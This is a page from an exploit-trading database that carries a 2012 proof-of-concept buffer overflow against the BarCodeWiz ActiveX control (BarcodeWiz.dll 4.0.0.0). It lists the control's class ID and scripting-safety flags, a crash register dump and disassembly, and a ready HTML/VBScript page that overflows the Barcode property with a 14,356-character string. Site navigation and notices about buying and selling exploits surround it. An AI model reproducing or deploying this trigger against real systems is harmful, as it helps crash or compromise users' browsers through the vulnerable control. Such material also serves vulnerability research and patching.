0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
BarcodeWiz.dll remote Buffer Overflow PoC
[Exploit Title: BarCodeWiz Barcode ActiveX(BarcodeWiz.dll) remote Buffer Overflow PoC
Date: July 25, 2012
Author: coolkaveh
coolkaveh@rocketmail.com
Https://twitter.com/coolkaveh
Vendor Homepage: http://barcodewiz.com/
Version: 4.0.0.0
Tested on: windows 7 SP2
awesome coolkaveh
==========================================================================
Class BarCodeWiz
GUID: {CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6}
Number of Interfaces: 1
Default Interface: IWiz
RegKey Safe for Script: True
RegkeySafe for Init: True
KillBitSet: False
Report for Clsid: {CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPersist Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data
--------------------------------------------------------------------------
Registers:
--------------------------------------------------------------------------
EIP 023F8D42
EAX 00000021
EBX 00000ADD
ECX 025A2F58 -> 02439F8C
EDX 00000001
EDI 0046D48C -> 00000068
ESI 025A2F58 -> 02439F8C
EBP 0046D47C -> 0046E48C
ESP 0046D464 -> 025A0AA8
Block Disassembly:
----------------------------------------------------------------------------
23F8D33 INC EBX
23F8D34 MOV [EBP+8],ECX
23F8D37 PUSH ECX
23F8D38 PUSH DWORD PTR [EBP-8]
23F8D3B MOV ECX,ESI
23F8D3D CALL 023F837E
23F8D42 MOV [EDI+EBX*4],EAX <--- CRASH
23F8D45 INC EBX
23F8D46 DEC DWORD PTR [EBP-4]
23F8D49 MOV EAX,[EBP-4]
23F8D4C CMP EAX,[EBP-C]
23F8D4F JL 023F8C80
23F8D55 JMP 023F8ECE
23F8D5A MOV EAX,[ESI]
23F8D5C PUSH EBX
ArgDump:
--------------------------------------------------
EBP+8 00000006
EBP+12 025A2F58 -> 02439F8C
EBP+16 00000068
EBP+20 00000021
EBP+24 00000021
EBP+28 00000021
============================================================================
<html>
Exploit
<object classid='clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6' id='poc' /></object>
<script language='vbscript'>
targetFile = "C:\Program Files (x86)\BarCodeWiz ActiveX Trial\DLL\BarcodeWiz.dll"
prototype = "Property Let Barcode As String"
memberName = "Barcode"
progid = "BARCODEWIZLib.BarCodeWiz"
argCount = 1
arg1=String(14356, "A")
poc.Barcode = arg1
</script>
# 0day.today [2024-11-17] #